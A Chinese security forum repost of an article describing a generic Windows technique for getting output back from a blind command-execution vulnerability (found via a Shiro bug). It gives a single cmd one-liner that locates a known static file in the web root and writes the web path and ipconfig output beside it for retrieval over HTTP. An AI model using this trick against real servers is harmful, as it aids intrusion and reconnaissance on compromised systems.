安全矩阵

 找回密码
 立即注册
搜索
查看: 4140|回复: 0

命令执行漏洞,Windows通用回显方法

[复制链接]

114

主题

158

帖子

640

积分

高级会员

Rank: 4

积分
640
发表于 2020-9-25 13:46:25 | 显示全部楼层 |阅读模式
命令执行漏洞,Windows通用回显方法
来源于公众号:漏洞推送
原文链接:https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247484560&idx=1&sn=9270d5f637eda78f4796237ba2a04f05&chksm=fe32b467c9453d71be149fa1f65e886b8e6287e99a7fa46411ad51209069a14d520ca9049fc4&mpshare=1&scene=23&srcid=0925cfB2Rnmf1SM9hPI6xIRh&sharer_sharetime=1601005409639&sharer_shareid=ff83fe2fe7db7fcd8a1fcbc183d841c4#rd

最近遇到的了一个shiro的漏洞,无法回显,Java我又不会,所以找到了一个比较通用的回显方法,唯一的条件就是需要有web服务,还需要一个名称唯一的静态资源名。

web目录如下所示


执行命令如下:
  1. cmd /c "for /f %i in ('dir /s /b d:a.php') do (echo %i> %i.path.txt)&(ipconfig > %i.ipconfig.txt)"
复制代码



要注意修改红框所在的d,如果web路径是在c盘就修改为c,不知道的话,就一个个慢慢试。

命令执行成功以后

a.php.ipconfig.txt为回显结果
a.php.path.txt为web路径



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 07:30 , Processed in 0.020206 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表